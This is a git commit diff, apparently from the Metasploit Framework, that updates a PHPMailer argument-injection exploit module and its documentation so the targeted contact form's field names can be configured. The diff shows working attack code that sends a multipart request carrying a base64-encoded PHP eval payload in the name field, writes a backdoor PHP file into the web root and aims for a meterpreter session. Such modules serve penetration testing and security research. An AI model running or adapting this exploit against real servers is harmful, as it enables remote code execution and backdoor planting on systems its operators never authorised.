Land #16721, Phpmailer arg injection update

smcintyre-r7 · smcintyre-r7 · commit 2d6e9100787f · 2022-06-29T13:00:48.000-04:00
diff --git a/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md b/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md
@@ -18,6 +18,17 @@ exploitation can take a few minutes.
   6.  Verify the module yields a PHP meterpreter session in < 5 minutes
   7.  Verify the malicious PHP file was automatically removed
 
+## Options
+
+### WAIT_TIMEOUT
+Seconds to wait to trigger the payload
+### NameField
+Name of the element for the Name field
+### EmailField
+Name of the element for the Email field
+### MessageField
+Name of the element for the Message field
+
 ## Scenarios
 
   Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)
diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -60,7 +60,10 @@ def initialize(info = {})
       ])
     register_advanced_options(
       [
-        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
+        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300]),
+        OptString.new('NameField', [true, 'Name of the element for the Name field', 'name'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('EmailField', [true, 'Name of the element for the Email field', 'email'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'], regex: /^([^\t\n\f \/>"'=]+)$/)
       ])
   end
 
@@ -98,6 +101,9 @@ def trigger(trigger_uri)
   end
 
   def exploit
+    name_field = datastore['NameField']
+    email_field = datastore['EmailField']
+    message_field = datastore['MessageField']
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
@@ -111,9 +117,9 @@ def exploit
 
     data = Rex::MIME::Message.new
     data.add_part('submit', nil, nil, 'form-data; name="action"')
-    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
-    data.add_part(email, nil, nil, 'form-data; name="email"')
-    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
+    data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
+    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")
 
     print_status("Writing the backdoor to #{payload_file_path}")
     res = send_request_cgi(
